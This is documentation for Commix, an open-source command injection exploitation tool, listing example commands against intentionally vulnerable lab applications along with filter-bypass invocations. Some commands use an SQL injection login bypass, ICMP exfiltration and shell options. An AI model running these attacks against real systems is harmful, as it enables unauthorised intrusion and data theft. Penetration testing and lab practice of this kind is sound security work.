Commix
https://github.com/commixproject/commix
Commix (short for [comm]and [i]njection e[x]ploiter) is an open source penetration testing tool, written by Anastasios Stasinopoulos (@ancst), that automates the detection and exploitation of command injection vulnerabilities.
Usage Examples
1. Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"
3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
4. Exploiting Persistence:
- Using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
- Using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"
5. Exploiting Damn Vulnerable NodeJS Application (DVNA):
root@kali:~/commix# python commix.py --url "http://127.0.0.1:9090/app/ping" --data "address=127.0.0.1" --cookie="connect.sid=s%3AIdvte5ieuGQC5C8jt5aSyUTSF8xZtls8.3fwCVsyypx%2BLGXtiF1JTBrqbmjp%2B29vwKoL0uxcHub8" -v1
6. Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"
8. Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock
9. Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"
10. Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3
11. Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3
12. Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
13. Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'
14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"
Filters Bypasses
Note: The following filters bypasses are based on dockerized version of Commix-testbed.
- Filter lax_domain_name.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/lax_domain_name.php" --data="addr=127.0.0.1" --prefix="a.b.c" --suffix="d.e.f"
- Filter nested_quotes.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/nested_quotes.php" --data="addr=127.0.0.1" --prefix="\"" --suffix="\""
- Filter no_space.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"
- Filter no_space_no_colon_no_pipe_no_ampersand.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
- Filter no_space_no_colon_no_pipe_no_ampersand_no_dollar.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"
- Filter no_colon_no_pipe_no_ampersand_no_dollar.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1"
- Filter no_white_chars.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars.php" --data="addr=127.0.0.1" --tamper="space2ifs"
- Filter no_white_chars_start_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_start_alphanum.php" --data="addr=127.0.0.1" --tamper="space2ifs" --prefix="abc"
- Filter no_white_chars_stop_alnum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/no_white_chars_stop_alnum.php" --data="addr=127.0.0.1" --tamper="space2ifs"
- Filter simple_stop_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/simple_stop_alphanum.php" --data="addr=127.0.0.1" --prefix="abc"
- Filter simple_start_alphanum.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/simple_start_alphanum.php" --data="addr=127.0.0.1"
- Filter multiple_os_commands_blacklisting.php bypass:
python commix.py --url="http://127.0.0.1/scenarios/filters/multiple_os_commands_blacklisting.php" --data="addr=127.0.0.1" --tamper="uninitializedvariable"